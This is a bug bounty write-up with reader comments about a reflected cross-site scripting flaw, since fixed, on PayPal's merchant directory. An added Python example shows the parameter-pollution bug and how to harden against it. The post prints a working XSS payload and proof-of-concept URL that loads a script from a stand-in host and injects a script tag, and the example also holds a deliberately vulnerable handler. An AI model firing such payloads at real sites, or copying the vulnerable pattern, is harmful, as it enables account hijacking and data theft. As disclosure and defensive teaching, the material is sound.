[BugBounty] Reflected Cross Site Scripting at Paypal.com

Dear followers, I found a reflected Cross Site Scripting issue on the new PayPal Directory service (https://www.paypal.com/directory/merchants), with the following payload:

&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

The vulnerable parameter was the q parameter. I was able to break the script context of the page; I think it was because of the &q parameter, but I am not sure. PayPal fixed this issue too fast, so I couldn't analyze it more in depth :/

https://www.paypal.com/directory/merchants?q=&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

Here is the POC I sent in to PayPal: hope you enjoyed! If you have any kind of question, please don't hesitate to ask me, either here or via email at patrik.fehrenbach(at)it-securityguard.com. All the best, Patrik


3 thoughts on “[BugBounty] Reflected Cross Site Scripting at Paypal.com”

  1. I have been working in Security in the UK for 10 years. I have only started to get a bit grumpy about security in general; however, after reading this piece it has helped change my attitude a bit. Time for a project, methinks 🙂

  2. I think you could get XSS via “&q=payload” because of HPP (HTTP Parameter Pollution).
    The first “q” parameter value was getting filtered while the second “q” parameter value was being used for generating the output 😀
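The pattern described in the post (a second q value that closes the quoted attribute and injects its own src attribute) and in the comment above (HPP: the filter reads one copy of q, the template reflects the other) can be reproduced in a few lines. The following is an added illustration, not PayPal's code and not the author's POC: the request handler, the filter and the template are assumptions; the "509" value and the example.com script URL are taken from the payload in the post, and the query string is constructed for this example. It shows the two-parser mismatch that lets a blank first q pass the check while the last q is reflected unencoded, and a hardened version that parses once, rejects duplicate keys and encodes for the attribute context.

```python
import html
import re
from urllib.parse import parse_qs, parse_qsl

# Constructed sample query string modelled on the payload from the post.
# Decoded second value: 509" src="http://www.example.com/exploit509.js <script>alert(1)</script>
SAMPLE_QUERY = ('q=&q=509%22%20src=%22http://www.example.com/exploit509.js'
                '%20%3Cscript%3Ealert%281%29%3C/script%3E')

# Assumed blacklist filter: looks for script tags or a stray double quote.
SCRIPT_RE = re.compile(r'<\s*/?\s*script', re.IGNORECASE)


def first_param(query, name):
    """Return the FIRST occurrence of a parameter (how the filter saw q)."""
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key == name:
            return value
    return None


def last_param(query, name):
    """Return the LAST occurrence of a parameter (how the template saw q)."""
    found = None
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key == name:
            found = value
    return found


def vulnerable_render(query):
    """Assumed vulnerable handler: filter and template disagree on which q
    is 'the' q, and the value is reflected into an attribute unencoded."""
    checked = first_param(query, 'q') or ''
    if SCRIPT_RE.search(checked) or '"' in checked:
        return '<p>blocked</p>'
    reflected = last_param(query, 'q') or ''
    return f'<input name="q" value="{reflected}">'


def hardened_render(query):
    """Hardened handler: one parse, duplicate keys rejected, output encoded
    for the HTML attribute context (quotes included)."""
    params = parse_qs(query, keep_blank_values=True)
    values = params.get('q', [''])
    if len(values) != 1:
        return '<p>bad request</p>'
    return f'<input name="q" value="{html.escape(values[0], quote=True)}">'


def attribute_broken(markup):
    """Crude detection: did the reflected value escape the quoted attribute
    (a second src attribute appeared) or inject a script tag?"""
    return ' src="' in markup or '<script' in markup.lower()


if __name__ == '__main__':
    vuln = vulnerable_render(SAMPLE_QUERY)
    print('vulnerable :', vuln, '-> broken:', attribute_broken(vuln))
    hard = hardened_render(SAMPLE_QUERY)
    print('hardened   :', hard, '-> broken:', attribute_broken(hard))
    single = hardened_render('q=509%22%20src%3D%22x')
    print('single q   :', single, '-> broken:', attribute_broken(single))
```

The fix that matters is not a better blacklist: the filter and the renderer must operate on the same parsed value, duplicate parameters should be treated as a malformed request (or at least resolved by one documented rule everywhere), and the value must be encoded for the exact context it lands in, here a double-quoted attribute.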
